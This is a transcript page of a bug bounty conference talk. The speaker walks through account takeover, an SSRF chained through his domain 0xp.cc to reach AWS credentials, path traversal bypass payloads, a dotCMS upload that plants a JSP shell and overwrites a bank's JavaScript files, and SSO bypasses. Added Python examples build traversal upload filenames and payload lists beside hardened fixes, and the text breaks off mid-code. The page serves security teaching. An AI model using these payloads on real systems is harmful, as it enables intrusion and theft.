
Bug Bounty on Steroids

BSides Ahmedabad · 2023 · 1:03:19 · 25K views · Published 2023-02 · Watch on YouTube
About this talk
Hussein Daher shares real-world vulnerability discoveries and exploitation techniques accumulated over a decade in bug bounty hunting. The talk walks through concrete examples including account takeover via invitation confusion, stored XSS via JavaScript file manipulation, local file disclosure, and SSO bypass methods, emphasizing the importance of collaboration and systematic methodology in finding high-impact bugs.
Original YouTube description:
Watch Hussein Daher (@HusseiN98D) talking about "Bug Bounty On Steroids" at BSides Ahmedabad 0x03. Slides: webimmunify.com/bsides #infosec #bugbounty #conference #cybersecurity #pentesting
Transcript (English):

So, well, we have someone coming up with tips to up your game and much more. So if hacking is an art, we have a very talented artist coming up next. Our next speaker has been in this industry for over 10 years, CEO of Web Immunify, winner of multiple events at HackerOne, Intigriti bug bash and many more, and for the very first time at BSides Ahmedabad: Hussein, thank you. Hey everyone, thank you for being here. So before we start I'd like to take a minute to thank the organizers of this event for inviting me over here. So obviously when I started bug bounty at first, like 2014, 2013, my first friends in bug bounty were

Indians, so it's really an honor for me to be here with you today. Thank you, thank you for being here. So today we're going to talk about bug bounty, and the name of the talk is Bug Bounty on Steroids. I'm going to try to showcase some vulnerabilities I have found over the last year and try to explain, and try to see how we ended up finding each vulnerability and how we thought about the vulnerability in the first place, because obviously you might sometimes see some applications, some endpoints, and you don't know how to start, or where to go, or what exactly to look for when you look at it. So we're just going to try to go

and try to explain this to you today. So before we start: my name is Hussein Daher, I'm Lebanese, living in West Africa, in Ivory Coast, a bug bounty hunter and security researcher. I'm Yahoo Elite, if you know that Yahoo has an elite section. I have won the Intigriti leaderboard this year, the first one, the Apache series swap, and also the Vigilante Award 2010, a HackerOne event, also best in collaboration at a HackerOne bug bash, best in collaboration. I have more than one thousand vulnerabilities reported all together on all bounty platforms combined. So let's just see the big titles of the talk. So first we have account takeover via confusion, we have transport tables,

server-side request forgery, we have local file disclosure and bypasses, hacking a bank by finding a zero-day, and SSO bypass techniques. So to those who know me here, you know that I love going for server-side issues, server-side vulnerabilities. So that's what I love going for and we're going to have a lot of this today in the talk, and try to get them really well explained to everyone. So if anyone does have any question while we go through, you can just raise your hand, I will make sure to stop and try to explain more. So let's start. Are you ready? You have the first talk here, the first big title: account takeover via

confusion. So I was hunting on this application, which is a public HackerOne program, and the application allows user A to invite user B to his organization, and user A is able to ask for a password reset for the account he invited, and user B gets the reset token link in his mails. So, as it stands, it doesn't look really obvious, but if you go at it from the hacker mind you might think that there is something to do here. So just think about it. For the sake of this report we can't show screenshots, because the company might sue me really, really quick, so we're just going to try to imagine how it's going.

So, imagine: you have this application where you have an organization, and then you're able to invite someone to your organization, and you're also able to click on a functionality that says "OK, reset password for this user", and once you do so the user is going to get a reset link to his email. So this is something that you might see in your days of bug bounty, because nowadays you have a lot of applications where you have a lot of organizations: you just sign up, have an organization, invite users, remove users and stuff. And how can we try to exploit this? So here's the proof of concept I came up with. User A,

which is us, the hackers, invites user B to his instance, to our own instance, where user B is his second email address. So you use a new controlled email for user B, you're going to invite user B to your account, to your organization, and then as a hacker you ask for a password reset for your own second user B, which you have previously invited. After that you go and you just copy the link from user B's email address and you just save it for a second. As a hacker you go back to your account and you just change the mail, change the email of user B to the victim account's email, and then once you

open the reset password link you got previously, what happens? You get account takeover, really easy and really quick. So this is like a sum-up for this: user A invites user B to join his organization, user A again asks for a password reset inside the application, just like for a normal password reset. So, as we can't post screenshots of this because the application has really strict terms and you might know where or which application it is, I'm just trying to sprint through it like this. But when you have this kind of account, this kind of organization, always look for the functionalities that might be abused, you know, because it might not seem

obvious to others, but if you spend time, you just read the documentation, you just try to play around with the functionalities and everything you have in your hands, it might lead to something that's exploitable, you know. So always try to stick to the functionalities, to the documentation, and try to gather all the functionalities you can have in your account. And so, as we said, user B just saves the link to the password reset, and then as a hacker you change back the email of user B to your victim's email, and once you open the reset password link, magically it goes and resets the password for user

C. So that was a confusion, because what was happening on the application side, they had two kinds of separate databases. So when you sign up, your user is going to get assigned another user in another database, that was like an SSO thing. So while resetting the password and changing the email back, one email was getting updated in one database but it wasn't updated in the second database. So what was happening was that you could just take over the account, and the bounty was 4K for this one. Not much, huh? Let's just go forward and go for server-side request forgery, which I love a lot. I had this application and after, you know, doing everything you might know of,
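Editorial example added to this transcript page (not code from the talk or from the affected application): a model of the invite-then-reset confusion. The two-store layout is an assumption reconstructed from the speaker's description (an application user table plus a separate "SSO" account store), as are the names and email addresses. The vulnerable class binds the reset token only to a user id and resolves the email at consume time; the hardened subclass binds the token to the email it was mailed to, revokes tokens on email change, and refuses to reassign an email that another account already owns.

```python
"""Model of the invite / password-reset 'confusion' from the talk (assumption)."""
import secrets


class ResetService:
    """Vulnerable: token -> user id only; email change updates one store only."""

    def __init__(self):
        self.app_users = {}      # app DB: user_id -> email        (assumed layout)
        self.sso_accounts = {}   # SSO store: email -> password    (assumed layout)
        self.tokens = {}         # reset token -> user_id

    def signup(self, user_id, email, password):
        self.app_users[user_id] = email
        self.sso_accounts[email] = password

    def invite(self, user_id, email):
        # invited users get a placeholder password until they reset it
        self.signup(user_id, email, secrets.token_hex(8))

    def request_reset(self, user_id):
        token = secrets.token_urlsafe(16)
        self.tokens[token] = user_id          # link is mailed to app_users[user_id]
        return token

    def change_email(self, user_id, new_email):
        # BUG: only the app table is updated; the SSO store keeps its own mapping
        self.app_users[user_id] = new_email

    def consume_reset(self, token, new_password):
        user_id = self.tokens.pop(token)
        email = self.app_users[user_id]        # resolved NOW, not when the token was issued
        self.sso_accounts[email] = new_password  # whichever SSO account carries that email
        return email


class HardenedResetService(ResetService):
    """Token bound to the email it was sent to; email changes revoke tokens."""

    def request_reset(self, user_id):
        token = secrets.token_urlsafe(16)
        self.tokens[token] = (user_id, self.app_users[user_id])
        return token

    def change_email(self, user_id, new_email):
        if new_email in self.sso_accounts:
            raise ValueError("email already belongs to another account")
        self.tokens = {t: v for t, v in self.tokens.items() if v[0] != user_id}
        old_email = self.app_users[user_id]
        self.app_users[user_id] = new_email
        self.sso_accounts[new_email] = self.sso_accounts.pop(old_email)  # keep both stores in sync

    def consume_reset(self, token, new_password):
        user_id, bound_email = self.tokens.pop(token)
        if self.app_users[user_id] != bound_email:
            raise PermissionError("email changed after the token was issued")
        self.sso_accounts[bound_email] = new_password
        return bound_email


VICTIM = "victim@example.com"   # constructed sample data


def run_attack(service_cls):
    """Replay the talk's steps. Returns (email whose password changed, victim's password)."""
    svc = service_cls()
    svc.signup("victim", VICTIM, "victim-original-pw")
    svc.signup("attacker", "attacker@0xp.cc", "attacker-pw")
    svc.invite("userB", "second@0xp.cc")          # 1. invite a user we control
    token = svc.request_reset("userB")            # 2. request a reset, keep the mailed link
    try:
        svc.change_email("userB", VICTIM)         # 3. point user B at the victim's address
    except ValueError:
        return None, svc.sso_accounts[VICTIM]
    try:
        changed = svc.consume_reset(token, "pwned")  # 4. open the saved reset link
    except (PermissionError, KeyError):
        changed = None
    return changed, svc.sso_accounts[VICTIM]


if __name__ == "__main__":
    print("vulnerable:", run_attack(ResetService))
    print("hardened:  ", run_attack(HardenedResetService))
```

Against the vulnerable service the saved link resets the victim's SSO password; against the hardened one the attack is stopped twice over (the email reassignment is refused, and even if it were not, the token no longer matches the email it was bound to).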

trying to gather endpoints, trying to crawl the applications, I had this specific request, and when you see the parameters here, is there anything that catches your mind? I think there is something that's really obvious that you might see every day in other applications. There is nothing that can catch you directly, but once you think about it, the region parameter looks really fishy, because when you think about regions you just say "oh, that's like Amazon", yeah, because you have all these regions and you have all these applications getting connected to it in the back end. And so it's cool to have some requests like this where you can try to play a bit with it.

So my testing methodology for such endpoints: first we set a random value inside the region parameter and you look for specific responses or specific behavior of the application. In our case here, once I just changed the region parameter to "test" or any string that you want, the result was a timeout response from the application. So that catches your mind directly. You might get like a 404, or you might get other, 403 maybe, so this is also something you have to look out for and try to keep in mind: when you try to change the parameter's value and you see like a huge change in the page's response, you have to tell

yourself that there is something going on here that we might be able to exploit. So as we said, here we had the timeout response from the application, that's fishy. [Just freezing a little bit.] After that, I did a little list containing different payloads to hopefully find and identify some interesting behavior. I have this host which is called 0xp.cc, which I own, and I gathered a bit of payloads that I wrote myself, put them in a list, and just started filling the parameter and seeing what's going on here. So as soon as I sent the list, I have this payload, 0xp.cc and the slash at the end,

which triggered like a DNS response from the server. So that's really interesting, because now if we're getting some DNS interaction we might be able to do something interesting. So from here you know that you're on the right path; you might be a little bit far from the result you want to achieve, but as soon as you get like the DNS callback you know that it's going to be a good story. What's happening in the back end of the application? When you see that, you know that something's happening from the back end, because as we see here, we had a ping back to sns.0xp.cc. It's really interesting to mention it. So when we enter the payload, we got the DNS callback to this

specific host, which is sns.mydomain. So that's really important for the next slides, because now what I do usually when I get this kind of stuff, I try to think around and try to gather as much info as I can, to try to be able to know how the application is handling my input. As for here, the application looks to be reading the region parameter value and issuing the following request, which is GET sns.<the value of region>.amazonaws.com, and from here I think it looks obvious how the exploitation is going to go. This is the 0xp.cc-and-slash payload; we have the following request being issued by the server, which is

sns.0xp.cc, and we have a slash that's breaking the Amazon host. We're breaking out of the syntax. How can you break out of this syntax? So for this we had two options. The first option is really easy: you just go create a host, create a subdomain for your domain, sns.0xp.cc, just create it, use the previous payload and boom, you get what you need here. But I didn't think about it really quick, and after sending the report, which is with this kind of payload that I used, I was just like "yeah, I could have done it easier, you know, I could have gone for this", but you can't have all the ideas at the same time, you know. So what

works for you, just go for it, it might end up paying well. The payload here is anything, and you add 0xp.cc and a slash after that, so the server's translation of that is sns.<anything>.0xp.cc/.amazonaws.com. So this way we broke out of the SNS subdomain, we specified our own domain and we escaped from the amazonaws host part. So after I got this idea... I'm sorry for the images, I'm not sure what's happening, but yeah, I'm going to try to explain. So I tried with google.com with the same payload, and by miracle it gave me back the google.com content, like "proof" or "not found",

and now I know that I'm definitely onto something and I'm on the good road. We can just go further with that. Good, but it's not enough for us. How can you read AWS secrets located at the AWS API endpoints you all know of? The application is doing HTTPS requests, while for this we have to use HTTP, because Amazon is not going to accept HTTPS requests to that. Pretty easy: we're going to use a redirect to first go from HTTPS back to HTTP and just give us the key. So we have this payload which we came up with. So you all know about the localdomain.pw domain, just setting like a 301 redirect

and redirecting to the Amazon host on HTTP again, with all the parameters that are needed. So, before the redirect to HTTP, we have this application, and here is the application's request, which says OK, sns. and the whole bunch of stuff we were coming up with. We had the bypass redirects here. So first the application is going to gather the content from localdomain.pw, and then from there we get back to, how to say, to Amazon AWS. But we still have a problem here: the application's request is sending the amazonaws part as part of the request now, because we have escaped it via the slash, but we don't want it here.

So, easy one here: we just have to add the question mark to escape this part and get it out of the way for the Amazon part, and just by doing that, bam. There is a little summary of what's happening: we have the application parser sending the request, we have the 301 redirect, and we have finally the last link the application is going to request and give us back the content, with the escaped question mark to escape from the .amazonaws thing, and here we go: luckily we just get the keys, and that's what you want to do. But for that, like, OK, the application was here for years and years but no one
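Editorial example added to this transcript page, not the speaker's code: it shows what the `region` value from the talk becomes once it is spliced into the `sns.<region>.amazonaws.com` template the speaker inferred, and the two checks a fixed backend needs. The template and the `0xp.cc` domain come from the talk; the `169.254.169.254` instance-metadata address is the well-known AWS endpoint the speaker only alludes to; the region regex and the redirect policy are the editor's assumptions, not the affected application's code.

```python
"""Region parameter -> outbound host, and the checks that close the hole (added example)."""
import re
from urllib.parse import urlsplit


def build_sns_url(region):
    """The vulnerable construction from the talk: untrusted value inside a hostname."""
    return f"https://sns.{region}.amazonaws.com/"


def request_target(url):
    """What the server's HTTP client will actually contact for a given URL."""
    p = urlsplit(url)
    return p.scheme, p.hostname, p.path, p.query


# payloads discussed in the talk (constructed list; comments are the editor's reading)
PAYLOADS = {
    "test":     "random probe -> sns.test.amazonaws.com, which timed out",
    "0xp.cc/":  "the slash ends the host; '.amazonaws.com' is pushed into the path",
    "0xp.cc/?": "the question mark pushes '.amazonaws.com' into the query string",
}

# Assumed allowlist shape for AWS region names, e.g. us-east-1, us-gov-west-1.
REGION_RE = re.compile(r"^[a-z]{2}(-gov)?-[a-z]+-\d$")


def build_sns_url_safe(region):
    """Fix 1: allowlist the value, then verify the parsed host is the intended one."""
    if not REGION_RE.fullmatch(region):
        raise ValueError(f"invalid region: {region!r}")
    url = build_sns_url(region)
    if urlsplit(url).hostname != f"sns.{region}.amazonaws.com":
        raise ValueError("host construction mismatch")
    return url


def redirect_allowed(from_url, to_url, allowed_suffix=".amazonaws.com"):
    """Fix 2: the talk's chain used a 301 to downgrade HTTPS to HTTP and point at an
    internal address. Refuse scheme downgrades and targets outside the intended suffix."""
    src, dst = urlsplit(from_url), urlsplit(to_url)
    if src.scheme == "https" and dst.scheme != "https":
        return False
    return (dst.hostname or "").endswith(allowed_suffix)


if __name__ == "__main__":
    for value, note in PAYLOADS.items():
        print(f"region={value!r:12} -> {request_target(build_sns_url(value))}   # {note}")
    print(redirect_allowed("https://sns.0xp.cc/", "http://169.254.169.254/latest/meta-data/"))
```

Running it shows the three stages of the talk side by side: the probe lands on a non-existent SNS host, the slash turns the attacker's domain into the host, and the question mark drops the leftover `.amazonaws.com` into the query string so the final redirect target is clean.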

found it. Why? Because no one tried to notice the little details. You have to really think about how, where did I see that, have I seen that before, can I exploit this in some other way, is there something I can do here? And this was a server-side request forgery with some kind of trickery that we used for that. So we're finishing this server-side request forgery. Is there any question so far for it here? [Music] Seems like everyone got it. Let's go forward. So we have the second topic of the talk, which is going to be local file disclosure bypasses. I always find this

local file inclusion, local file disclosure, and you just get like 403, go home, you're not going to hack us today. That happens a lot, right? And I had this application here, with this 1.0.php?f=document.pdf. The first thoughts: local file disclosure, local file inclusion, maybe remote file inclusion you might think of too. So there are a lot of things that come to mind, but yeah, I'm going for local file disclosure here. The classic payloads we all know of: we're just going to do ../../etc/passwd if it's a Linux machine, or maybe going just for the first payload or this third payload, it all depends on what you're hacking on, but

yeah, sadly we got 403 Forbidden here, so we can't pass, the server doesn't look like it accepts that slash here. So what can we do? It all depends on the application, but a lot of the time what has been working for me on PHP applications is Unicode-encoding the dots, for example, or Unicode-encoding the slash, or, better, a null byte between the dots. So let's see how it works. So we have this website here, cass.wtf, where you just give it an input and it just gives you back some Unicode translations of the character you give, and that might be handy too, also for other

kinds of attacks, not only like server-side request forgery or local file disclosure bypasses, but also like account takeovers; you might have some Unicode not being interpreted very well, so this is really handy. By just encoding, Unicode-encoding the dot here, we get this payload that you might be able to try in case the ../ is blocked. So we have this here which you might try; I mean, you never know what might happen in the back end, you know, we're hackers, we don't have access to the source code, so if you don't test you can't know. You have to test everything you have in your

hands, your weapons here, your tries. Requests are free, no one is going to bill you for that, so you just try it out. And the null byte bypass here is trying to do like dot, null byte, dot, and you just go for stuff like that. And it's not only to say that this is what I found recently, but in other cases you might also try some other kinds of stuff. You might think about not only null bytes, maybe trying to encode some other characters in the request and trying to send it. So, and here, by sending the payload, you can see here the dot and we have the null byte

and download.php, and this one worked very well and gave me access to the application source code. So what we're trying to explain here is not that these are the only two bypasses that you might use; it's just to give you the ideas behind bypasses and how you can try to think and try to come up with other payloads, because you have to use a lot of creativity to be able to achieve this kind of thing. So we're going forward, and this is an interesting topic, which is hacking a bank by finding a zero-day. This vulnerability was in collaboration with Shops, you know him from infosec, I guess, and
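Editorial example added to this transcript page (not the speaker's payloads or the affected application's code): it shows why the encoded-dot, encoded-slash, overlong-UTF-8 and null-byte variants the speaker describes get past a check that only looks for a literal `../`, and how a resolver that decodes and canonicalises before checking stops all of them. The naive filter, the null-byte-dropping layer and the web root path are modelled assumptions; the payload list is constructed for the example.

```python
"""Traversal filter bypasses from the talk versus a canonicalise-then-check resolver (added example)."""
import posixpath
from urllib.parse import unquote_to_bytes


def decode_overlong_utf8(raw):
    """UTF-8 decode that also accepts 2-byte overlong forms (0xC0/0xC1 lead byte),
    the way some legacy decoders did: %c0%af -> '/', %c0%ae -> '.'."""
    out = bytearray()
    i = 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F))
            i += 2
        else:
            out.append(b)
            i += 1
    return out.decode("utf-8", errors="replace")


def naive_check(user_path):
    """Modelled filter behind the talk's 403: reject only a literal '../' or '..\\' in the raw value."""
    return "../" not in user_path and "..\\" not in user_path


def canonicalize(user_path):
    """Decode (bounded, so double encoding is covered), accept overlong forms,
    drop NUL bytes (modelled: a layer that strips them), unify separators."""
    s = user_path
    for _ in range(3):
        decoded = decode_overlong_utf8(unquote_to_bytes(s))
        if decoded == s:
            break
        s = decoded
    return s.replace("\x00", "").replace("\\", "/")


def safe_resolve(root, user_path):
    """Return the path to serve, or None if the request escapes the root."""
    candidate = posixpath.normpath(posixpath.join(root, canonicalize(user_path)))
    if posixpath.commonpath([root, candidate]) != root:
        return None
    return candidate


# constructed payloads; each one the talk's bypass ideas would produce
PAYLOADS = {
    "plain":      "../../etc/passwd",
    "url-slash":  "..%2f..%2fetc/passwd",
    "url-dots":   "%2e%2e/%2e%2e/etc/passwd",
    "double-enc": "..%252f..%252fetc/passwd",
    "overlong":   "..%c0%af..%c0%afetc/passwd",
    "nul-dot":    ".%00./.%00./etc/passwd",
    "benign":     "document.pdf",
}


def evaluate(root="/var/www/files"):
    """For each payload: (does the naive filter let it through?, what the safe resolver serves)."""
    return {name: (naive_check(p), safe_resolve(root, p)) for name, p in PAYLOADS.items()}


if __name__ == "__main__":
    for name, (naive_ok, served) in evaluate().items():
        print(f"{name:11} naive-allows={naive_ok!s:5} safe-serves={served}")
```

Every encoded variant sails past the literal check, while the canonicalising resolver rejects all of them and still serves the benign file; the lesson is to decide on the decoded, normalised path, not on the bytes the client sent.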

are you really a hacker if you have never hacked your bank? That's the question, huh. And the story of CVE-2022-26352: I was invited to this bug bounty program that was owned by a bank. All the assets were the bank's, and they just said OK, all the subdomains are in scope, just go for what you want and let us know what you find. And first things first, I started doing recon. So while doing recon, gathering subdomains, looking at applications, CMSes, what is being used in the back end, we found that the application is mostly using a CMS called dotCMS, which is a Java-based application, and my

mate for Java applications is called Jux, you know, so I just hit Jux up and I said OK man, you have to work with me on this one. So what is dotCMS? dotCMS is an open-source content management system written in Java for managing content and content-driven sites and applications. So the bank here was using this CMS, which they edited a bit, you know, for their needs, for login, for banking purposes mostly, not for casual purposes, and just using it on almost like 100 subdomains of theirs on different servers. So every subdomain using that CMS was isolated from the others; it wasn't like one

single server. Everyone was looking for low-hanging bugs, because the program had just launched, you know, so everyone is going for automation, trying nuclei here, nuclei there, with basic templates like many people do, and obviously you're going to get duplicates. Nuclei is really, really powerful, as you have seen in the other talks, but you have to be able to create your own templates and try to find your own bugs and try to look for them on other hosts, because obviously if you go only for the templates that are available, there is a high chance that you're going to get duplicates. And I can tell you that people that are doing automation

right now in the industry, they're really good, so trying to outperform them with two or three bash-line scripts, that's not going to work at all. So if you want to go for automation you have to make sure that your automation is like another level, because when you see guys like Eric, for example, today, he built a hacking system on his own; you can't just come and start using public templates and try to overcome and overpass him, that's not going to work. So as I said, I said OK man, let them look for the templates and let us dig deeper into the application

and see what's going on. And we chose to download the CMS and try to go for some white-box source auditing and try to find some interesting behavior in the application, or vulnerabilities. The file here, ContentResource.java, has this little snippet of code which tells us that we don't need authentication for certain APIs, and that's interesting, because if for this specific path of the API we don't need authentication, in case we find something interesting we have like an unauthenticated remote command execution or an unauthenticated server-side request forgery, you know, and at this point it's just game over: there's no reason the bug bounty program is not going to go forward with

your bug. And so we had the unauthenticated access to the API, and we also found that, oops, there is an arbitrary file upload somewhere in the API. So the CMS is highly tested, dotCMS, you might check it later, but a lot of people, a lot of hackers who audited the source code, missed this vulnerability because it was really hidden inside the code. And so you had this snippet of code that tells you that, OK, there's this endpoint inside the API that you can use to upload. So that's game over for them; we just go forward. Now we have, big one, please press two. So if we have

unauthenticated access to the API and you have arbitrary file upload, then connecting the dots, you have an unauthenticated API and arbitrary file upload, maybe remote command execution, in case of one thing: in case the directory of the web server is writable, because if it's not writable it's going to be hard. Here is the request we had, building a proof of concept: we had this request to /api/content which you can access without any authentication, and we just tell it OK, I want to upload this file, and what we did in the file is that we're doing path traversal inside the web root directory, for the file to be uploaded in the web server directory where we can access the shell we are

uploading. And so here we just have like the JSP shell code we can just enter, and sadly for us, for this program, the web directory was not writable. It would have been too easy, right? And what we started doing is that we started enumerating directories to see which is writable and what can happen, what we can do with that. We identified this certain behavior where a 500 error and size 0, so there is no content from the server, means the file was written successfully. So as you can see here, I'm not sure if you can see, but it says like /tmp/<my handle>/ and it's just like 500,

OK, 500 server error, and the file is written here. And in case we get a 500 error and the application says "could not be created", the directory does not exist at all, and we don't have create-directory permissions either. And in case we get like "denied", the directory exists but we don't have the rights to upload the files to this directory specifically. So as an example here, we tried to upload to /proc/self/cwd, which is the current working directory, to try to upload it there, but no luck: web directory not writable, RIP, no remote command execution for us. Other solutions that we might use to achieve other great impact, to show the

application in the background, oops. Yeah, we didn't get remote execution, because we couldn't find any writable directories, but yeah, we can do other stuff, let us show you. We found that we're able to replace jar files, Java files, because it was running like Tomcat, and so you have some points that you can replace, and in case there is a system reboot, your remote command execution is just going to get triggered with the reboot. Or we can also replace system files, some of them were writable, or you can also add system config files to the server, maybe uploading SSH keys and stuff like this, but we chose another way. After digging a bit deeper we found that

remote command execution is not possible, but we have to prove more impact. The solution we found is that we are able to use a gadget to replace JavaScript files on the server. So what does that mean? That means that by using the vulnerability we're able to replace any JavaScript file on the domain, so basically stored XSS on the whole banking assets, like all of them. So if you have stored XSS without anything, you have access basically to everything and anything, and it was a huge bank, so the traffic here is pretty, pretty, pretty much. So how did we find that? By opening a JavaScript file in the browser and looking in the response headers, we had a

certain ID that was tied to the JavaScript file, which is like, when a developer uploads a JavaScript file, it just gets an ID in the database, and so that ID was getting sent back in the headers of the response, and the header name was ETag in the headers. So we had to upload the file as follows: filename equals, and we found that we had to do first char of the ID, then second char of the ID, then the full ID and then the file name; we had to save it too. If you go forward you can see here that the ETag for /application/projects.js, this specific file, was

ETag: and this random string that was given back to us. So yeah, this is how we replace JavaScript files: we just use ../ to escape out of the thing, then the first char, second char of the ID, the full ID and the file name and path, and this way we were able to replace the JavaScript file. You can see here that we included a little console.log with our own handle, so every time you visit the bank website path we get the cookies back (we don't do it actually, yeah). So for this part it's really interesting to know that collaboration can lead you to so many interesting pathways. You
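Editorial example added to this transcript page, not the speaker's proof of concept or dotCMS code: it assembles the multipart upload with a traversal filename the way the talk's `/api/content` probe did, classifies responses using the three signals the speaker read off the server (500 with empty body, "could not be created", "denied"), and derives the JavaScript-overwrite filename from an ETag header by the first-char/second-char/full-id/name layout he describes. The exact response strings, the traversal depth and the storage layout are assumptions; the sample ETag and paths are constructed.

```python
"""Writable-directory probing and ETag-derived overwrite path, modelled on the talk (added example)."""
import uuid


def build_multipart(filename, content, boundary=None):
    """Return (Content-Type header value, body) for a single-file multipart/form-data POST.
    The filename is placed verbatim, so a '../' prefix reaches the server's path handling."""
    boundary = boundary or uuid.uuid4().hex
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="file"; filename="{filename}"\r\n'
        "Content-Type: application/octet-stream\r\n\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return f"multipart/form-data; boundary={boundary}", head + content + tail


def classify_upload(status, body):
    """Map a response to the outcomes the talk describes (assumed strings)."""
    text = body.decode("utf-8", "replace").lower()
    if status == 500 and len(body) == 0:
        return "written"          # 500 with empty body: the file landed on disk
    if "could not be created" in text:
        return "dir-missing"      # directory absent, and no permission to create it
    if "denied" in text:
        return "no-write-perm"    # directory exists, not writable for the server user
    return "unknown"


def traversal_filename(depth, target):
    """'../' * depth then the absolute target with its leading slash removed."""
    return "../" * depth + target.lstrip("/")


def js_overwrite_filename(etag_header, js_name, depth=1):
    """Talk: <id[0]>/<id[1]>/<full id>/<file name>, reached via traversal (layout assumed)."""
    obj_id = etag_header.strip()
    if obj_id.startswith("W/"):        # weak validator prefix, if present
        obj_id = obj_id[2:]
    obj_id = obj_id.strip('"')
    if len(obj_id) < 2:
        raise ValueError("ETag too short to derive a storage path")
    return traversal_filename(depth, f"{obj_id[0]}/{obj_id[1]}/{obj_id}/{js_name}")


# constructed probe list in the order the talk tried them
PROBE_TARGETS = ["/var/www/webroot/shell.jsp", "/proc/self/cwd/shell.jsp", "/tmp/probe/marker.txt"]


def probe_plan(depth=5):
    """Filenames to submit, one per candidate directory."""
    return [traversal_filename(depth, t) for t in PROBE_TARGETS]


if __name__ == "__main__":
    ctype, body = build_multipart(probe_plan()[2], b"marker", "BOUNDARY")
    print(ctype)
    print(body.decode())
    print(js_overwrite_filename('"a1b2c3d4"', "projects.js"))
```

The response classification is the part worth keeping: the speaker's point is that the server never said "OK", and only the pattern of 500s told him which directories were writable.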

might be trying to hack an application and not finding any solution, trying to bypass what you're trying to hack on, but as soon as you just go forward and ask some friends that have a bit more knowledge about something specific, they might have the solution to your problems. So you don't have to just hunt alone. At the end of the day, collaboration just keeps you motivated, it keeps you hacking more together, it brings a good friendship between you and also more bounties, because the next day if your friend finds something he can't exploit, he's just going to tell you "oh please come hack with me, try to help me here", and if

you know the solution to the issue, you're just going to help him, and that's going to be really good momentum. And so for this bug I was a bit disappointed by the, how to say, by the bounty, because we had the same vulnerabilities on like 100 different subdomains, so totally different servers, and the company decided to reward like 15K for this one. So still good, but not enough for a big bank. We go forward here for SSO bypass techniques. So this is going to be interesting, shall we enter? Every time you just go to an application, admin.corp.com, and just like, boom, man, Okta, you can't pass, or you just get like

another kind of SSO and you just can't, it says like you don't pass, you shall not pass, man. Nowadays most organizations use SSO for internal panel logins and restricted resources, but does it mean that you just stop here? If you open up a subdomain you just found and it says like SSO or some kind of panel, you don't have to stop here; you go forward, because even though there is SSO or another kind of authentication, you might be able to bypass it using some other techniques and try to access the restricted content and have access to the panels. What it might be handy to do in these

cases: it might be handy to brute-force directories, look for leaked passwords, maybe in leaked databases, as Adam said earlier in the morning, and you might try to hit APIs directly; maybe if you can find some with the gau tool you might find some endpoints to try to hit directly and see how it responds, or other offensive vectors we'll be talking about today. Don't only brute-force files, but also brute-force parameters on the files. OK, so let's say you have the subdomain which redirects to Okta, you know, and you start brute-forcing the domain for files and

you just find admin.php, which is like a valid file, but it just keeps sending you back to Okta. You have to try; at least what I do is that I try to brute-force parameters on the specific endpoints, even though it does send me back to Okta. You might have something like admin.php and a parameter that says OK, loggedin=true, that might just tell you OK, you're in, you know; you don't know what's happening in the back end. So this is a little overview of what's happening. Let's say you have this domain, admin.org.com, and it's sending you back to Okta. You have admin.org.com,

you have this one, /internal.php, which says 301 redirect. So here you know that the file exists, because for the previous file we didn't have it, we had a 404 Not Found, so you know that this one is here, but you just don't have access to it. And when we try to brute-force for parameters we just get like id=1 and bam, 200 OK. Even though you don't have access to the full panel, you just have access to a limited resource, but it's still enough to prove impact and to try to gather other endpoints. Maybe you might find other endpoints in the response that you might look for

parameters on, and keep crawling like this and keep expanding that exercise that you have. APIs here: as you have heard said earlier, JavaScript files are like a gold mine, and that's true, 100 percent. JavaScript files contain so much data, so much information that you might miss if you're not reading, if you're not spending time trying to understand how the application is working, like the server-side endpoints that are mentioned there. We have this, this is pretty simple: you have just like 200 OK to SSO, and once you look at the content source you just see the different JavaScript files you get on the panel, and the server-side

routes are like on the client side, you know, and you just find a casual endpoint, just try it and you get like 200 OK. So that's really important to look for. So, less known: I'm going to talk about some techniques that I have been using in the last year. I haven't seen much information about them on the internet, so I thought that it might be handy to share them with you here. So what I used to do when I saw panels that had authentication like SSO stuff, Okta, and you can't just go in: I just gathered a list of parameters, of endpoints, sorry, of extensions, so

you have .php, .jpg, .png and all this stuff, .js, and just gathered it all together in one single word list, and I try to brute-force the path. I get redirected to other SSO things or Okta stuff, and at this point when you try to hit with the extensions, so PHP you get 403, HTML 403 and all other things 403, but jpg says like, oh, 404. That's interesting, because, like OK, the application might be blocking all the kinds of extensions because they don't want you to access this, but this is OK: jpg files, like image files, nothing sensitive in that, you can access it. If you find something that's living in a directory having a jpg file, just access it.

So in JSP applications this might be handy. You have already seen the same thing with the dot, like just having the semicolon at the end and stuff, and what I've been doing recently is this kind of payload. So I just take the panel that's getting me redirected, brute-force for extensions, and then the one that gives a different response to the others, I'm just going to stick it on like this and try to access the panel like this. I've had quite some luck on some private programs with some JSP files like this. It doesn't always work, but it's always worth it, right, because you never know. So this is like a little recap

of this big title. So you have internal.org.com that gives you SSO, you have /test.js, again SSO, and when you go to /test.jpg, 404 Not Found; this is really different from what we used to see. So if we just go to internal.org.com with the payload being included here, we get like 200 OK, because the server is thinking OK, this is a jpg file, and we said that OK, jpgs are not harmful, you can access jpg files, and so like this we're able to access the admin panel on the server. Other fancy vectors that I've been using recently too: so you have this internal.org.com that sends you back to SSO,
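Editorial example added to this transcript page, not the speaker's payload or any real gateway's code: it models the parsing mismatch behind the extension trick. A front door (reverse proxy or SSO gateway) decides on the extension of the raw request path, while a Tomcat-style servlet container strips `;...` path parameters from every segment before routing, so a request that the gateway classifies as an image can land on the admin servlet. Both behaviours are modelled assumptions, the `;.jpg` suffix is the editor's concrete reading of the speaker's "stick it on like this", and the host names and status codes are constructed.

```python
"""Gateway-versus-container path parsing behind the extension bypass (added example)."""
import posixpath

PUBLIC_EXTENSIONS = {"jpg", "png", "gif", "css", "ico"}   # assumed static-asset allowlist


def gateway_requires_sso(raw_path):
    """Modelled gateway rule: requests whose last segment ends in an image/asset
    extension skip SSO. The decision is taken on the RAW path."""
    last = raw_path.rsplit("/", 1)[-1]
    ext = last.rsplit(".", 1)[-1].lower() if "." in last else ""
    return ext not in PUBLIC_EXTENSIONS


def container_route(raw_path):
    """Modelled servlet-container normalisation: drop ';param' from each segment,
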